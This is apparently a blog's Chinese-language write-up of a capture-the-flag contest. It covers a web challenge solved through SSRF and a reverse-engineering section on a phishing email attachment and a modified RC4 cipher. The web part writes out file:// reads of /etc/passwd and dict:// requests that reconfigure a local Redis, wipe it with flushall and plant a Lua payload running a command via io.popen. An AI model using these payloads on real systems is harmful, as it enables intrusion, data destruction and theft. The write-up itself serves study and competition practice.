第18届软件系统安全大赛攻防赛wp
Web
CachedVisitor
- 环境搭建
1 |
|
1 |
|
- 访问环境
- 一般遇到这样的环境访问URL,首先想到SSRF,其次是闭合RCE
- file:///etc/passwd
- file:///readflag
- 但是这里读不了flag,根据dockerfile看flag的权限不可读
- 测试dict://
- dict://127.0.0.1:6379/config set dir /scripts
- dict://127.0.0.1:6379/config set dbfilename visit.script
- dict://127.0.0.1:6379/flushall
- ![image-20250122011053583](https://xu17-1326239041.cos.ap-guangzhou.myqcloud.com/xu17/202501220110721.png
- dict://127.0.0.1:6379/set shell “\n\n\n##LUA_START##ngx.say(io.popen(‘/readflag’):read(‘*a’))##LUA_END##\n\n\n”
- dict://127.0.0.1:6379/save
方法2 gopher协议
- 参考ZPZ团队wp
1 |
|
1 |
|
Reference
Re
钓鱼邮件
给了一个.eml
文件,outlook打开,有一个生日快乐.zip
,解压需要密码,根据发件日期,24岁等信息,可以猜测出解压密码即为生日20001111
解压后得到生日快乐.exe
,双击运行,wirshark抓包,找到ip
和port
md5结果
donntyousee
查看函数sub_405559()
存在花指令
将ret
nop掉
动调跑一下,这里一定要在函数sub_405559()
里面下断,不然单步会直接跳过该函数,直接跟丢了
多次尝试发现这个call
是进行输入的地方,这里直接进行输入然后步过
这两个call步入
第一个call
,发现是rc4初始化
第二个call
是魔改的RC4,最后加了个亦或
跟一下加密后的结果,找到存储密文的地址unk_5C6CC0
然后去看密文在哪里进行check
,这里交叉引用
定位到函数sub_4054FB
,这个call步入
发现密文
秘钥key
这里做了反调试,导致key动态和静态的值不一样
将密文和key
dump出来,用工具解密即可
第18届软件系统安全大赛攻防赛wp
https://xu17.top/2025/01/06/第18届软件系统安全大赛攻防赛wp/